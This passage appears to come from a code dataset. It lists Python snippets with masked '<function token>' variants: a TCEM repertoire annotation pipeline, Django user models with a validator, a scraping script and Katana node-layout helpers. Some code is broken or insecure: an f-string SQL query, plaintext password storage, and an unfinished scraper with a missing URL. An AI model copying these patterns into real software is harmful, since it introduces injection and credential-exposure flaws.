pd.DataFrame.from_dict(tbl, orient='index')\n tbl.to_csv(self.tcem_annotation_path)\n",
"<import token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n\n\nclass TcemRepertoire(CapTask):\n <assignment token>\n <function token>\n <function token>\n\n @classmethod\n def version(cls):\n return 'v0.1.1'\n\n def tool_version(self):\n return self.version()\n <function token>\n\n @classmethod\n def _module_name(cls):\n return 'tcems::tcem_repertoire'\n <function token>\n\n @property\n def tcem_counts_path(self):\n return self.output()[f'tcem_counts'].path\n\n def _run(self):\n motif_counts = parse_mixcr_table(self.mixcr.igh_path)\n out = pd.DataFrame.from_dict(motif_counts, orient='index')\n out.to_csv(self.tcem_counts_path)\n\n\nclass AnnotatedTcemRepertoire(CapTask):\n module_description = \"\"\"\n This module identifies repertoires of TCEMs in VDJ clonal sequences.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.repetoire = TcemRepertoire.from_cap_task(self)\n self.db = TcemNrAaDb.from_cap_task(self)\n self.config = PipelineConfig(self.config_filename)\n\n def requires(self):\n return self.repetoire\n\n @classmethod\n def version(cls):\n return 'v0.1.0'\n\n def tool_version(self):\n return self.version()\n\n @classmethod\n def dependencies(cls):\n return [TcemRepertoire]\n\n @classmethod\n def _module_name(cls):\n return 'tcems::annotated_tcem_repertoire'\n\n def output(self):\n out = {'tcem_annotations': self.get_target(\n f'annotated_tcem_repertoire', 'csv')}\n return out\n\n @property\n def tcem_annotation_path(self):\n return self.output()[f'tcem_annotations'].path\n\n def _run(self):\n with sqlite3.connect(self.db.tcem_index) as conn:\n c = conn.cursor()\n rep = pd.read_csv(self.repetoire.tcem_counts_path)\n kmers = rep.iloc[:, 1].unique()\n tbl = {}\n for kmer in kmers:\n tbl[kmer] = {}\n cmd = f'SELECT taxon FROM taxa_kmers WHERE kmer = \"{kmer}\"'\n for taxon in c.execute(cmd):\n tbl[kmer][taxon] = 1\n tbl = pd.DataFrame.from_dict(tbl, orient='index')\n tbl.to_csv(self.tcem_annotation_path)\n",
"<import token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n\n\nclass TcemRepertoire(CapTask):\n <assignment token>\n <function token>\n <function token>\n <function token>\n\n def tool_version(self):\n return self.version()\n <function token>\n\n @classmethod\n def _module_name(cls):\n return 'tcems::tcem_repertoire'\n <function token>\n\n @property\n def tcem_counts_path(self):\n return self.output()[f'tcem_counts'].path\n\n def _run(self):\n motif_counts = parse_mixcr_table(self.mixcr.igh_path)\n out = pd.DataFrame.from_dict(motif_counts, orient='index')\n out.to_csv(self.tcem_counts_path)\n\n\nclass AnnotatedTcemRepertoire(CapTask):\n module_description = \"\"\"\n This module identifies repertoires of TCEMs in VDJ clonal sequences.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.repetoire = TcemRepertoire.from_cap_task(self)\n self.db = TcemNrAaDb.from_cap_task(self)\n self.config = PipelineConfig(self.config_filename)\n\n def requires(self):\n return self.repetoire\n\n @classmethod\n def version(cls):\n return 'v0.1.0'\n\n def tool_version(self):\n return self.version()\n\n @classmethod\n def dependencies(cls):\n return [TcemRepertoire]\n\n @classmethod\n def _module_name(cls):\n return 'tcems::annotated_tcem_repertoire'\n\n def output(self):\n out = {'tcem_annotations': self.get_target(\n f'annotated_tcem_repertoire', 'csv')}\n return out\n\n @property\n def tcem_annotation_path(self):\n return self.output()[f'tcem_annotations'].path\n\n def _run(self):\n with sqlite3.connect(self.db.tcem_index) as conn:\n c = conn.cursor()\n rep = pd.read_csv(self.repetoire.tcem_counts_path)\n kmers = rep.iloc[:, 1].unique()\n tbl = {}\n for kmer in kmers:\n tbl[kmer] = {}\n cmd = f'SELECT taxon FROM taxa_kmers WHERE kmer = \"{kmer}\"'\n for taxon in c.execute(cmd):\n tbl[kmer][taxon] = 1\n tbl = pd.DataFrame.from_dict(tbl, orient='index')\n tbl.to_csv(self.tcem_annotation_path)\n",
"<import token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n\n\nclass TcemRepertoire(CapTask):\n <assignment token>\n <function token>\n <function token>\n <function token>\n\n def tool_version(self):\n return self.version()\n <function token>\n\n @classmethod\n def _module_name(cls):\n return 'tcems::tcem_repertoire'\n <function token>\n <function token>\n\n def _run(self):\n motif_counts = parse_mixcr_table(self.mixcr.igh_path)\n out = pd.DataFrame.from_dict(motif_counts, orient='index')\n out.to_csv(self.tcem_counts_path)\n\n\nclass AnnotatedTcemRepertoire(CapTask):\n module_description = \"\"\"\n This module identifies repertoires of TCEMs in VDJ clonal sequences.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.repetoire = TcemRepertoire.from_cap_task(self)\n self.db = TcemNrAaDb.from_cap_task(self)\n self.config = PipelineConfig(self.config_filename)\n\n def requires(self):\n return self.repetoire\n\n @classmethod\n def version(cls):\n return 'v0.1.0'\n\n def tool_version(self):\n return self.version()\n\n @classmethod\n def dependencies(cls):\n return [TcemRepertoire]\n\n @classmethod\n def _module_name(cls):\n return 'tcems::annotated_tcem_repertoire'\n\n def output(self):\n out = {'tcem_annotations': self.get_target(\n f'annotated_tcem_repertoire', 'csv')}\n return out\n\n @property\n def tcem_annotation_path(self):\n return self.output()[f'tcem_annotations'].path\n\n def _run(self):\n with sqlite3.connect(self.db.tcem_index) as conn:\n c = conn.cursor()\n rep = pd.read_csv(self.repetoire.tcem_counts_path)\n kmers = rep.iloc[:, 1].unique()\n tbl = {}\n for kmer in kmers:\n tbl[kmer] = {}\n cmd = f'SELECT taxon FROM taxa_kmers WHERE kmer = \"{kmer}\"'\n for taxon in c.execute(cmd):\n tbl[kmer][taxon] = 1\n tbl = pd.DataFrame.from_dict(tbl, orient='index')\n tbl.to_csv(self.tcem_annotation_path)\n",
"<import token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n\n\nclass TcemRepertoire(CapTask):\n <assignment token>\n <function token>\n <function token>\n <function token>\n\n def tool_version(self):\n return self.version()\n <function token>\n <function token>\n <function token>\n <function token>\n\n def _run(self):\n motif_counts = parse_mixcr_table(self.mixcr.igh_path)\n out = pd.DataFrame.from_dict(motif_counts, orient='index')\n out.to_csv(self.tcem_counts_path)\n\n\nclass AnnotatedTcemRepertoire(CapTask):\n module_description = \"\"\"\n This module identifies repertoires of TCEMs in VDJ clonal sequences.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.repetoire = TcemRepertoire.from_cap_task(self)\n self.db = TcemNrAaDb.from_cap_task(self)\n self.config = PipelineConfig(self.config_filename)\n\n def requires(self):\n return self.repetoire\n\n @classmethod\n def version(cls):\n return 'v0.1.0'\n\n def tool_version(self):\n return self.version()\n\n @classmethod\n def dependencies(cls):\n return [TcemRepertoire]\n\n @classmethod\n def _module_name(cls):\n return 'tcems::annotated_tcem_repertoire'\n\n def output(self):\n out = {'tcem_annotations': self.get_target(\n f'annotated_tcem_repertoire', 'csv')}\n return out\n\n @property\n def tcem_annotation_path(self):\n return self.output()[f'tcem_annotations'].path\n\n def _run(self):\n with sqlite3.connect(self.db.tcem_index) as conn:\n c = conn.cursor()\n rep = pd.read_csv(self.repetoire.tcem_counts_path)\n kmers = rep.iloc[:, 1].unique()\n tbl = {}\n for kmer in kmers:\n tbl[kmer] = {}\n cmd = f'SELECT taxon FROM taxa_kmers WHERE kmer = \"{kmer}\"'\n for taxon in c.execute(cmd):\n tbl[kmer][taxon] = 1\n tbl = pd.DataFrame.from_dict(tbl, orient='index')\n tbl.to_csv(self.tcem_annotation_path)\n",
"<import token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n\n\nclass TcemRepertoire(CapTask):\n <assignment token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n def _run(self):\n motif_counts = parse_mixcr_table(self.mixcr.igh_path)\n out = pd.DataFrame.from_dict(motif_counts, orient='index')\n out.to_csv(self.tcem_counts_path)\n\n\nclass AnnotatedTcemRepertoire(CapTask):\n module_description = \"\"\"\n This module identifies repertoires of TCEMs in VDJ clonal sequences.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.repetoire = TcemRepertoire.from_cap_task(self)\n self.db = TcemNrAaDb.from_cap_task(self)\n self.config = PipelineConfig(self.config_filename)\n\n def requires(self):\n return self.repetoire\n\n @classmethod\n def version(cls):\n return 'v0.1.0'\n\n def tool_version(self):\n return self.version()\n\n @classmethod\n def dependencies(cls):\n return [TcemRepertoire]\n\n @classmethod\n def _module_name(cls):\n return 'tcems::annotated_tcem_repertoire'\n\n def output(self):\n out = {'tcem_annotations': self.get_target(\n f'annotated_tcem_repertoire', 'csv')}\n return out\n\n @property\n def tcem_annotation_path(self):\n return self.output()[f'tcem_annotations'].path\n\n def _run(self):\n with sqlite3.connect(self.db.tcem_index) as conn:\n c = conn.cursor()\n rep = pd.read_csv(self.repetoire.tcem_counts_path)\n kmers = rep.iloc[:, 1].unique()\n tbl = {}\n for kmer in kmers:\n tbl[kmer] = {}\n cmd = f'SELECT taxon FROM taxa_kmers WHERE kmer = \"{kmer}\"'\n for taxon in c.execute(cmd):\n tbl[kmer][taxon] = 1\n tbl = pd.DataFrame.from_dict(tbl, orient='index')\n tbl.to_csv(self.tcem_annotation_path)\n",
"<import token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n\n\nclass TcemRepertoire(CapTask):\n <assignment token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n\nclass AnnotatedTcemRepertoire(CapTask):\n module_description = \"\"\"\n This module identifies repertoires of TCEMs in VDJ clonal sequences.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.repetoire = TcemRepertoire.from_cap_task(self)\n self.db = TcemNrAaDb.from_cap_task(self)\n self.config = PipelineConfig(self.config_filename)\n\n def requires(self):\n return self.repetoire\n\n @classmethod\n def version(cls):\n return 'v0.1.0'\n\n def tool_version(self):\n return self.version()\n\n @classmethod\n def dependencies(cls):\n return [TcemRepertoire]\n\n @classmethod\n def _module_name(cls):\n return 'tcems::annotated_tcem_repertoire'\n\n def output(self):\n out = {'tcem_annotations': self.get_target(\n f'annotated_tcem_repertoire', 'csv')}\n return out\n\n @property\n def tcem_annotation_path(self):\n return self.output()[f'tcem_annotations'].path\n\n def _run(self):\n with sqlite3.connect(self.db.tcem_index) as conn:\n c = conn.cursor()\n rep = pd.read_csv(self.repetoire.tcem_counts_path)\n kmers = rep.iloc[:, 1].unique()\n tbl = {}\n for kmer in kmers:\n tbl[kmer] = {}\n cmd = f'SELECT taxon FROM taxa_kmers WHERE kmer = \"{kmer}\"'\n for taxon in c.execute(cmd):\n tbl[kmer][taxon] = 1\n tbl = pd.DataFrame.from_dict(tbl, orient='index')\n tbl.to_csv(self.tcem_annotation_path)\n",
"<import token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<class token>\n\n\nclass AnnotatedTcemRepertoire(CapTask):\n module_description = \"\"\"\n This module identifies repertoires of TCEMs in VDJ clonal sequences.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.repetoire = TcemRepertoire.from_cap_task(self)\n self.db = TcemNrAaDb.from_cap_task(self)\n self.config = PipelineConfig(self.config_filename)\n\n def requires(self):\n return self.repetoire\n\n @classmethod\n def version(cls):\n return 'v0.1.0'\n\n def tool_version(self):\n return self.version()\n\n @classmethod\n def dependencies(cls):\n return [TcemRepertoire]\n\n @classmethod\n def _module_name(cls):\n return 'tcems::annotated_tcem_repertoire'\n\n def output(self):\n out = {'tcem_annotations': self.get_target(\n f'annotated_tcem_repertoire', 'csv')}\n return out\n\n @property\n def tcem_annotation_path(self):\n return self.output()[f'tcem_annotations'].path\n\n def _run(self):\n with sqlite3.connect(self.db.tcem_index) as conn:\n c = conn.cursor()\n rep = pd.read_csv(self.repetoire.tcem_counts_path)\n kmers = rep.iloc[:, 1].unique()\n tbl = {}\n for kmer in kmers:\n tbl[kmer] = {}\n cmd = f'SELECT taxon FROM taxa_kmers WHERE kmer = \"{kmer}\"'\n for taxon in c.execute(cmd):\n tbl[kmer][taxon] = 1\n tbl = pd.DataFrame.from_dict(tbl, orient='index')\n tbl.to_csv(self.tcem_annotation_path)\n",
"<import token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<class token>\n\n\nclass AnnotatedTcemRepertoire(CapTask):\n <assignment token>\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.repetoire = TcemRepertoire.from_cap_task(self)\n self.db = TcemNrAaDb.from_cap_task(self)\n self.config = PipelineConfig(self.config_filename)\n\n def requires(self):\n return self.repetoire\n\n @classmethod\n def version(cls):\n return 'v0.1.0'\n\n def tool_version(self):\n return self.version()\n\n @classmethod\n def dependencies(cls):\n return [TcemRepertoire]\n\n @classmethod\n def _module_name(cls):\n return 'tcems::annotated_tcem_repertoire'\n\n def output(self):\n out = {'tcem_annotations': self.get_target(\n f'annotated_tcem_repertoire', 'csv')}\n return out\n\n @property\n def tcem_annotation_path(self):\n return self.output()[f'tcem_annotations'].path\n\n def _run(self):\n with sqlite3.connect(self.db.tcem_index) as conn:\n c = conn.cursor()\n rep = pd.read_csv(self.repetoire.tcem_counts_path)\n kmers = rep.iloc[:, 1].unique()\n tbl = {}\n for kmer in kmers:\n tbl[kmer] = {}\n cmd = f'SELECT taxon FROM taxa_kmers WHERE kmer = \"{kmer}\"'\n for taxon in c.execute(cmd):\n tbl[kmer][taxon] = 1\n tbl = pd.DataFrame.from_dict(tbl, orient='index')\n tbl.to_csv(self.tcem_annotation_path)\n",
"<import token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<class token>\n\n\nclass AnnotatedTcemRepertoire(CapTask):\n <assignment token>\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.repetoire = TcemRepertoire.from_cap_task(self)\n self.db = TcemNrAaDb.from_cap_task(self)\n self.config = PipelineConfig(self.config_filename)\n\n def requires(self):\n return self.repetoire\n <function token>\n\n def tool_version(self):\n return self.version()\n\n @classmethod\n def dependencies(cls):\n return [TcemRepertoire]\n\n @classmethod\n def _module_name(cls):\n return 'tcems::annotated_tcem_repertoire'\n\n def output(self):\n out = {'tcem_annotations': self.get_target(\n f'annotated_tcem_repertoire', 'csv')}\n return out\n\n @property\n def tcem_annotation_path(self):\n return self.output()[f'tcem_annotations'].path\n\n def _run(self):\n with sqlite3.connect(self.db.tcem_index) as conn:\n c = conn.cursor()\n rep = pd.read_csv(self.repetoire.tcem_counts_path)\n kmers = rep.iloc[:, 1].unique()\n tbl = {}\n for kmer in kmers:\n tbl[kmer] = {}\n cmd = f'SELECT taxon FROM taxa_kmers WHERE kmer = \"{kmer}\"'\n for taxon in c.execute(cmd):\n tbl[kmer][taxon] = 1\n tbl = pd.DataFrame.from_dict(tbl, orient='index')\n tbl.to_csv(self.tcem_annotation_path)\n",
"<import token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<class token>\n\n\nclass AnnotatedTcemRepertoire(CapTask):\n <assignment token>\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.repetoire = TcemRepertoire.from_cap_task(self)\n self.db = TcemNrAaDb.from_cap_task(self)\n self.config = PipelineConfig(self.config_filename)\n\n def requires(self):\n return self.repetoire\n <function token>\n <function token>\n\n @classmethod\n def dependencies(cls):\n return [TcemRepertoire]\n\n @classmethod\n def _module_name(cls):\n return 'tcems::annotated_tcem_repertoire'\n\n def output(self):\n out = {'tcem_annotations': self.get_target(\n f'annotated_tcem_repertoire', 'csv')}\n return out\n\n @property\n def tcem_annotation_path(self):\n return self.output()[f'tcem_annotations'].path\n\n def _run(self):\n with sqlite3.connect(self.db.tcem_index) as conn:\n c = conn.cursor()\n rep = pd.read_csv(self.repetoire.tcem_counts_path)\n kmers = rep.iloc[:, 1].unique()\n tbl = {}\n for kmer in kmers:\n tbl[kmer] = {}\n cmd = f'SELECT taxon FROM taxa_kmers WHERE kmer = \"{kmer}\"'\n for taxon in c.execute(cmd):\n tbl[kmer][taxon] = 1\n tbl = pd.DataFrame.from_dict(tbl, orient='index')\n tbl.to_csv(self.tcem_annotation_path)\n",
"<import token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<class token>\n\n\nclass AnnotatedTcemRepertoire(CapTask):\n <assignment token>\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.repetoire = TcemRepertoire.from_cap_task(self)\n self.db = TcemNrAaDb.from_cap_task(self)\n self.config = PipelineConfig(self.config_filename)\n\n def requires(self):\n return self.repetoire\n <function token>\n <function token>\n\n @classmethod\n def dependencies(cls):\n return [TcemRepertoire]\n\n @classmethod\n def _module_name(cls):\n return 'tcems::annotated_tcem_repertoire'\n\n def output(self):\n out = {'tcem_annotations': self.get_target(\n f'annotated_tcem_repertoire', 'csv')}\n return out\n <function token>\n\n def _run(self):\n with sqlite3.connect(self.db.tcem_index) as conn:\n c = conn.cursor()\n rep = pd.read_csv(self.repetoire.tcem_counts_path)\n kmers = rep.iloc[:, 1].unique()\n tbl = {}\n for kmer in kmers:\n tbl[kmer] = {}\n cmd = f'SELECT taxon FROM taxa_kmers WHERE kmer = \"{kmer}\"'\n for taxon in c.execute(cmd):\n tbl[kmer][taxon] = 1\n tbl = pd.DataFrame.from_dict(tbl, orient='index')\n tbl.to_csv(self.tcem_annotation_path)\n",
"<import token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<class token>\n\n\nclass AnnotatedTcemRepertoire(CapTask):\n <assignment token>\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.repetoire = TcemRepertoire.from_cap_task(self)\n self.db = TcemNrAaDb.from_cap_task(self)\n self.config = PipelineConfig(self.config_filename)\n <function token>\n <function token>\n <function token>\n\n @classmethod\n def dependencies(cls):\n return [TcemRepertoire]\n\n @classmethod\n def _module_name(cls):\n return 'tcems::annotated_tcem_repertoire'\n\n def output(self):\n out = {'tcem_annotations': self.get_target(\n f'annotated_tcem_repertoire', 'csv')}\n return out\n <function token>\n\n def _run(self):\n with sqlite3.connect(self.db.tcem_index) as conn:\n c = conn.cursor()\n rep = pd.read_csv(self.repetoire.tcem_counts_path)\n kmers = rep.iloc[:, 1].unique()\n tbl = {}\n for kmer in kmers:\n tbl[kmer] = {}\n cmd = f'SELECT taxon FROM taxa_kmers WHERE kmer = \"{kmer}\"'\n for taxon in c.execute(cmd):\n tbl[kmer][taxon] = 1\n tbl = pd.DataFrame.from_dict(tbl, orient='index')\n tbl.to_csv(self.tcem_annotation_path)\n",
"<import token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<class token>\n\n\nclass AnnotatedTcemRepertoire(CapTask):\n <assignment token>\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.repetoire = TcemRepertoire.from_cap_task(self)\n self.db = TcemNrAaDb.from_cap_task(self)\n self.config = PipelineConfig(self.config_filename)\n <function token>\n <function token>\n <function token>\n <function token>\n\n @classmethod\n def _module_name(cls):\n return 'tcems::annotated_tcem_repertoire'\n\n def output(self):\n out = {'tcem_annotations': self.get_target(\n f'annotated_tcem_repertoire', 'csv')}\n return out\n <function token>\n\n def _run(self):\n with sqlite3.connect(self.db.tcem_index) as conn:\n c = conn.cursor()\n rep = pd.read_csv(self.repetoire.tcem_counts_path)\n kmers = rep.iloc[:, 1].unique()\n tbl = {}\n for kmer in kmers:\n tbl[kmer] = {}\n cmd = f'SELECT taxon FROM taxa_kmers WHERE kmer = \"{kmer}\"'\n for taxon in c.execute(cmd):\n tbl[kmer][taxon] = 1\n tbl = pd.DataFrame.from_dict(tbl, orient='index')\n tbl.to_csv(self.tcem_annotation_path)\n",
"<import token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<class token>\n\n\nclass AnnotatedTcemRepertoire(CapTask):\n <assignment token>\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.repetoire = TcemRepertoire.from_cap_task(self)\n self.db = TcemNrAaDb.from_cap_task(self)\n self.config = PipelineConfig(self.config_filename)\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n def output(self):\n out = {'tcem_annotations': self.get_target(\n f'annotated_tcem_repertoire', 'csv')}\n return out\n <function token>\n\n def _run(self):\n with sqlite3.connect(self.db.tcem_index) as conn:\n c = conn.cursor()\n rep = pd.read_csv(self.repetoire.tcem_counts_path)\n kmers = rep.iloc[:, 1].unique()\n tbl = {}\n for kmer in kmers:\n tbl[kmer] = {}\n cmd = f'SELECT taxon FROM taxa_kmers WHERE kmer = \"{kmer}\"'\n for taxon in c.execute(cmd):\n tbl[kmer][taxon] = 1\n tbl = pd.DataFrame.from_dict(tbl, orient='index')\n tbl.to_csv(self.tcem_annotation_path)\n",
"<import token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<class token>\n\n\nclass AnnotatedTcemRepertoire(CapTask):\n <assignment token>\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.repetoire = TcemRepertoire.from_cap_task(self)\n self.db = TcemNrAaDb.from_cap_task(self)\n self.config = PipelineConfig(self.config_filename)\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n def output(self):\n out = {'tcem_annotations': self.get_target(\n f'annotated_tcem_repertoire', 'csv')}\n return out\n <function token>\n <function token>\n",
"<import token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<class token>\n\n\nclass AnnotatedTcemRepertoire(CapTask):\n <assignment token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n def output(self):\n out = {'tcem_annotations': self.get_target(\n f'annotated_tcem_repertoire', 'csv')}\n return out\n <function token>\n <function token>\n",
"<import token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<class token>\n\n\nclass AnnotatedTcemRepertoire(CapTask):\n <assignment token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n",
"<import token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<class token>\n<class token>\n"
] | false |
99,811 | b6f498aa1e91eea437cec1c0b1e15d729dfa3e64 | from __future__ import unicode_literals
from django.db import models
import datetime as dt
import re
EMAIL_REGEX = re.compile(r'^[a-zA-Z0-9.+_-]+@[a-zA-Z0-9._-]+\.[a-zA-Z]+$')
class UserManager(models.Manager):
def basic_validator(self, postData):
errors = {}
if len(postData['firstname']) < 3:
errors["firstname"] = "First name should be longer than 2 characters!"
print "There is an error"
if len(postData['username']) < 3:
errors["username"] = "First name should be longer than 2 characters!"
print "There is an error"
if not EMAIL_REGEX.match(postData['email']):
errors['email'] = "Email does not match the correct format"
print "There is an error"
if len(postData['password']) < 8:
errors["password"] = "Password must be 8 characters"
print "There is an error"
if (postData['confirmation'] != postData['password']):
errors["confirmation"] = "Passwords do not match"
print "There is an error"
return errors
class User(models.Model):
firstname = models.CharField(max_length = 255)
username = models.CharField(max_length = 255)
password = models.CharField(max_length = 255)
email = models.CharField(max_length = 255)
created_at = models.DateTimeField(auto_now_add = True)
updated_at = models.DateTimeField(auto_now = True)
objects = UserManager()
class Event(models.Model):
name = models.CharField(max_length = 255)
start = models.CharField(max_length = 255)
stop = models.CharField(max_length = 255)
location = models.CharField(max_length = 255)
description = models.CharField(max_length = 255)
created_at = models.DateTimeField(auto_now_add = True)
updated_at = models.DateTimeField(auto_now = True)
user = models.ForeignKey(User, related_name = "events")
class Group(models.Model):
groupname = models.CharField(max_length = 255)
created_at = models.DateTimeField(auto_now_add = True)
updated_at = models.DateTimeField(auto_now = True)
# Create your models here.
| [
"from __future__ import unicode_literals\nfrom django.db import models\nimport datetime as dt\nimport re\nEMAIL_REGEX = re.compile(r'^[a-zA-Z0-9.+_-]+@[a-zA-Z0-9._-]+\\.[a-zA-Z]+$')\n\n\n\nclass UserManager(models.Manager):\n def basic_validator(self, postData):\n errors = {}\n if len(postData['firstname']) < 3:\n errors[\"firstname\"] = \"First name should be longer than 2 characters!\"\n print \"There is an error\"\n if len(postData['username']) < 3:\n errors[\"username\"] = \"First name should be longer than 2 characters!\"\n print \"There is an error\"\n if not EMAIL_REGEX.match(postData['email']):\n errors['email'] = \"Email does not match the correct format\"\n print \"There is an error\"\n if len(postData['password']) < 8:\n errors[\"password\"] = \"Password must be 8 characters\"\n print \"There is an error\"\n if (postData['confirmation'] != postData['password']):\n errors[\"confirmation\"] = \"Passwords do not match\"\n print \"There is an error\"\n return errors\n\n\nclass User(models.Model):\n firstname = models.CharField(max_length = 255)\n username = models.CharField(max_length = 255)\n password = models.CharField(max_length = 255)\n email = models.CharField(max_length = 255)\n created_at = models.DateTimeField(auto_now_add = True)\n updated_at = models.DateTimeField(auto_now = True)\n objects = UserManager()\n\nclass Event(models.Model):\n name = models.CharField(max_length = 255)\n start = models.CharField(max_length = 255)\n stop = models.CharField(max_length = 255)\n location = models.CharField(max_length = 255)\n description = models.CharField(max_length = 255)\n created_at = models.DateTimeField(auto_now_add = True)\n updated_at = models.DateTimeField(auto_now = True)\n user = models.ForeignKey(User, related_name = \"events\")\n\nclass Group(models.Model):\n groupname = models.CharField(max_length = 255)\n created_at = models.DateTimeField(auto_now_add = True)\n updated_at = models.DateTimeField(auto_now = True)\n\n\n\n\n\n\n# Create your models here.\n"
] | true |
99,812 | ec99b3da3033827574f8c92512ed25c9776ecaee | import os, requests, subprocess

# url = 'https://google.come/favicon.ico'
# r = requests.get(url, allow_redirects=True)
# open ('google.ico', 'wb').write(r.content)

req = requests.get()  # NOTE: the page URL to scrape is missing from this call in the original
text = req.text
img_url_list = []

text_list = text.split('img')

def locate_image(e):
    # take the value between the first pair of double quotes (the src attribute)
    img_url = e.split('"')[1]
    img_url_list.append(img_url)

for e in text_list:
    if 'src' in e:
        locate_image(e)

print(img_url_list)

for i in img_url_list:
    req = requests.get(f'GITHUB', stream=True)  # placeholder URL kept as in the original
    # assumption: the incomplete with-statement was meant to save each downloaded image locally
    with open(i[:4], 'wb') as f:
        f.write(req.content)
| [
"import os, requests, subprocess\n\n \n# url = 'https://google.come/favicon.ico'\n# r = requests.get(url, allow_redirects=True)\n# open ('google.ico', 'wb').write(r.content)\n\n\nreq = requests.get()\ntext = req.text\nimg_url_list = []\n\ntext_list = text.split('img')\n\ndef locate_image(e):\n \n e = e.find('\"')\n \n img_url = e.split('\"')\n img_url = img_url[1]\n img_url_list.append(img_url)\n \nfor e in text_list:\n if 'src' in e:\n locate_image(e)\n\nprint(img_url_list)\n\nfor i in img_url_list:\n req = requests.get(f'GITHUB', stream=True)\n \n with open(i[:4])\n \n"
] | true |
99,813 | f2affb16265b73cb4113da4ee7c03fbd3a14fa14 | from Katana import (
NodegraphAPI
)
def change_node_layout(node, x_spacing=200, y_spacing=100):
"""
"""
pos_x, pos_y = NodegraphAPI.GetNodePosition(node)
# Start far enough to the left to leave room for all the node's inputs
new_pos_x = pos_x - (x_spacing * (node.getNumInputPorts() - 1)) / 2
new_pos_y = pos_y + y_spacing
for input_port in node.getInputPorts():
if input_port.getNumConnectedPorts():
input_node = input_port.getConnectedPort(0).getNode()
# Stop if we hit our own parent - this means the connection leaves
# the GroupNode we're in
if input_node != node.getParent():
NodegraphAPI.SetNodePosition(input_node, (new_pos_x, new_pos_y))
# Recursively call this function
change_node_layout(input_node, x_spacing, y_spacing)
new_pos_x += x_spacing
def add_node_reference_param(dest_node, dest_node_param_name, node):
"""
"""
# Get or create the parameter on the given node
dest_node_param = dest_node.getParameter(dest_node_param_name)
if not dest_node_param:
dest_node_param = dest_node.getParameters().createChildString(dest_node_param_name, "")
# Set the expression to point to the node name
dest_node_param.setExpression("getNode('{node_name}').getNodeName()".format(node_name=node.getName()))
def get_reference_node(node, key):
"""
"""
parameter = node.getParameter("node_" + key)
if not parameter:
return None
return NodegraphAPI.GetNode(parameter.getValue(0))
| [
"from Katana import (\n NodegraphAPI\n)\n\n\ndef change_node_layout(node, x_spacing=200, y_spacing=100):\n \"\"\"\n \"\"\"\n pos_x, pos_y = NodegraphAPI.GetNodePosition(node)\n\n # Start far enough to the left to leave room for all the node's inputs\n new_pos_x = pos_x - (x_spacing * (node.getNumInputPorts() - 1)) / 2\n new_pos_y = pos_y + y_spacing\n\n for input_port in node.getInputPorts():\n if input_port.getNumConnectedPorts():\n input_node = input_port.getConnectedPort(0).getNode()\n\n # Stop if we hit our own parent - this means the connection leaves\n # the GroupNode we're in\n if input_node != node.getParent():\n NodegraphAPI.SetNodePosition(input_node, (new_pos_x, new_pos_y))\n\n # Recursively call this function\n change_node_layout(input_node, x_spacing, y_spacing)\n\n new_pos_x += x_spacing\n\n\ndef add_node_reference_param(dest_node, dest_node_param_name, node):\n \"\"\"\n \"\"\"\n # Get or create the parameter on the given node\n dest_node_param = dest_node.getParameter(dest_node_param_name)\n\n if not dest_node_param:\n dest_node_param = dest_node.getParameters().createChildString(dest_node_param_name, \"\")\n\n # Set the expression to point to the node name\n dest_node_param.setExpression(\"getNode('{node_name}').getNodeName()\".format(node_name=node.getName()))\n\n\ndef get_reference_node(node, key):\n \"\"\"\n \"\"\"\n parameter = node.getParameter(\"node_\" + key)\n\n if not parameter:\n return None\n\n return NodegraphAPI.GetNode(parameter.getValue(0))\n",
